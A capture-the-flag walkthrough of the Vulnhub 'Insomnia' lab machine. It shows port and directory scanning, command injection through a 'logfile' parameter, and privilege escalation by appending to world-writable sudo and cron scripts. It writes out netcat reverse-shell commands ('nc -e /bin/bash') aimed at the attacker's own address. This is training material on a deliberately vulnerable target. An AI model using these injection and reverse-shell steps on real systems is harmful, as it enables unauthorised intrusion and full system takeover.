Skip to content
Home ยป Insomnia Walkthrough – Vulnhub – Writeup

Insomnia Walkthrough – Vulnhub – Writeup

insomnia walkthrough vulnhub writeup

Insomnia is an easy machine from Vulnhub by alienum. We have to understand LFI, RCE, sudo abuse and cron job abuse to get to the root machine. Here, I will be doing the full method, i.e. getting the user flag first and then getting the root flag. However, once you get the foothold, you can directly go for the root access but this is not intended by the author. “Insomnia Walkthrough – Vulnhub – Writeup”.

Link to the machine: https://www.vulnhub.com/entry/insomnia-1,644/

Walkthrough of Orasi machine by the same author

Identify the target

We have to identify the IP address of the target first.

fping -aqg 10.0.2.0/24

I got my IP address as 10.0.2.15 and that of the target as 10.0.2.114.

Scan the open ports

Next, we have to scan the open ports on the target so that we get the services that we can interact with.

sudo nmap -v -T4 -A -p- -oN nmap.log 10.0.2.114

There is only one port open. So, we might have to go deep and not wide which is easier in my view.

Enumerate the web server

The default page has a simple chat interface that works one way only.

When we do a directory scan, we can get new paths.

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .html,.php,.txt -u http://10.0.2.114:8080/FUZZ -of html -o dir.html -fs 2899

The chat.txt path stored the chat messages.

However, the administration.php file had something interesting.

We can see from the screenshot above that it might be expecting something after the colon symbol. Then, I checked the chat page.

Here, we can see a line on the chatbox. So, we can guess that the file was expecting something. Therefore, I tried fuzzing the get parameter.

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 'http://10.0.2.114:8080/administration.php?FUZZ=anything' -of html -o admin-get.html -fs 65

Luckily, we got a get parameter logfile that also allowed file inclusion and code execution.

Well, it’s not file inclusion but based on the file, it performed some operations. Thus, let’s try a different payload.

?logfile=chat.txt;whoami

This gave the execution of the command whose results we can see on the chatbox. Hence, we can try spawning a reverse shell on port 9001.

# on local machine
nc -nlvp 9001

Let’s check if the target has netcat available.

?logfile=;which nc

Since it has netcat, we can connect to our port.

?logfile=;nc -e /bin/bash 10.0.2.15 9001

Finally, we got the foothold.

Upgrade to an intelligent reverse shell

Get a user’s access

Next, I checked the sudo permissions of the user www-data.

sudo -l

From the screenshot above, we can see that the user can execute a script without requiring a password as the user julia. So, I checked the permissions on the file.

cd /var/www/html
ls -al

It allowed other uses than the owner root to write on it. Therefore, I added the binary bash at the end of the script.

echo '/bin/bash' >> start.sh

So, now, if we execute the script as the user julia, we will also be executing bash as the same user.

sudo -u julia bash /var/www/html/start.sh

Finally, I got the user’s flag.

cd
ls -al
cat user.txt

Root privilege escalation

When I looked at the crontab, I got a script being run every minute.

cat /etc/crontab

Then, we can check the permission of the script as well as we did for the previous script.

ls -l /var/cron/check.sh

It also had access to writing for other users. However, since this runs in the background, it’s better to spawn another reverse shell.

nc -nlvp 9002

So, I added the code to spawn a reverse shell on the script.

echo 'nc -e /bin/bash 10.0.2.15 9002' >> /var/cron/check.sh

After some time, I got the reverse shell. Finally, I got the root flag.

cd
ls -al
cat root.txt
5 1 vote
Article Rating
Subscribe
Notify of
guest
2 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments

AdBlock Detected


This website is made possible by displaying online advertisements to the visitors.
Please consider supporting me by disabling your ad blocker.

Refresh